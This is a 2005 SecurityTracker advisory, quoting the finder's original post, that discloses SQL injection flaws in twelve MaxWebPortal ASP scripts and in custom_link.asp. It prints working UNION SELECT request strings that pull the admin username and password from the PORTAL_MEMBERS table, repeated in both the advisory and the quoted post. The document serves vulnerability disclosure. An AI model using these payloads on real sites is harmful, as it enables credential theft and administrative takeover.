SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   MaxWebPortal Vendors:   Yuan, Max
MaxWebPortal Has Input Validation Holes in Multiple Scripts That Permit SQL Injection and Grant Remote Administrative Access
SecurityTracker Alert ID:  1013845
SecurityTracker URL:  http://securitytracker.com/id/1013845
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 29 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  

Description:   Soroush Dalili from Grayhatz security group reported a vulnerability in MaxWebPortal. A remote user can inject SQL commands to gain administrative access.

Several scripts do not properly validate user-supplied input. As a result, a remote user can supply specially crafted parameter values to execute SQL commands on the underlying database.

The following scripts are affected:

article_popular.asp
dl_popular.asp
links_popular.asp
pic_popular.asp
article_rate.asp
dl_rate.asp
links_rate.asp
pic_rates.asp
article_toprated.asp
dl_toprated.asp
links_toprated.asp
pic_toprated.asp

Some demonstration exploit requests are provided:

Dl_Popular.asp?40 DL_ID,Hit,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select

Links_Popular.asp?10
LINK_ID,Hit,DESCRIPTION,NAME,POST_DATE,banner_url,1,1,1,1,1,1,1 FROM LINKS
union select m_username,m_password,1,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS
where m_username='admin' union select

pics_popular.asp?10 LINK_ID, HIT,NAME, URL, KEYWORD, DESCRIPTION, EMAIL, POST_DATE,
BANNER_URL, CATEGORY, PARENT_ID, SHOW, BADLINK FROM pic union select
m_username,m_password,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select

dl_toprated.asp?10 RATING,Votes,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select

custom_link.asp?method=Topic&TOPIC_ID=[Sql inject]

custom_link.asp?method=Forum&Forum_ID=[Sql inject]

Impact:   A remote user can execute SQL commands on the underlying database. This can be exploited to retrieve passwords and gain administrative access to the application.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.maxwebportal.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Critical bug in Maxwebportal (Critical sql injections)


Hi, I'm Soroush Dalili , From Grayhatz security group (grayhatz.com). I find 
some bugs in maxwebportal. this 
work in all versions till now!
-----------------------------
Description: Remote user can find other's user's password from some sql 
injection so can gain admin. of portal!
What's that? -> Maxwebportal is good and free asp portal that used in many 
sites (also in my old site!)
Bugz:
Remote user can gain other password by some sql injections in:
article_popular.asp
dl_popular.asp
links_popular.asp
pic_popular.asp
article_rate.asp
dl_rate.asp
links_rate.asp
pic_rates.asp
article_toprated.asp
dl_toprated.asp
links_toprated.asp
pic_toprated.asp
------------------------------------------------------------------------------------------------------------
Proof:
Some Exploits:
Get Username=Admin password: (if I didn't write some of them,  you can make 
them easily by yourself!)
----------------
Dl_Popular.asp?40 DL_ID,Hit,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL 
union select 
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where 
m_username='admin' union 
select
---------------
Links_Popular.asp?10 
LINK_ID,Hit,DESCRIPTION,NAME,POST_DATE,banner_url,1,1,1,1,1,1,1 FROM LINKS 
union select m_username,m_password,1,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS 
where 
m_username='admin' union select
--------------
pics_popular.asp?10 LINK_ID, HIT,NAME, URL, KEYWORD, DESCRIPTION, EMAIL, 
POST_DATE, 
BANNER_URL, CATEGORY, PARENT_ID, SHOW, BADLINK FROM pic union select 
m_username,m_password,1,1,1,1,1,1,1 from PORTAL_MEMBERS where 
m_username='admin' union select
-------------
dl_toprated.asp?10 RATING,Votes,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 
FROM DL union select 
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where 
m_username='admin' union 
select
------------
you can make it in other pages too!
-----------------------------------------------------------------------------------------------------------------
some another Sql injections are:
custom_link.asp?method=Topic&TOPIC_ID=[Sql inject] 
custom_link.asp?method=Forum&Forum_ID=[Sql inject] 

-----------------------------------------------------------------------------------------------------------------
Vendor URL:  Http://www.maxwebportal.info , http://www.maxwebportal.com
Soloution: Some patch are available in www.maxwebportal.info
Cause: Sql injection
Version: all versions before 2005/4/27 (maxwebportal 2.x, 1.35 , ... )
Fix Available:  Some of them are available
Finder: Soroush Dalili ( Grayhatz security group )
Email: Irsdl@yahoo.com , S-dalili@sbu.ac.ir
Country: Iran
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC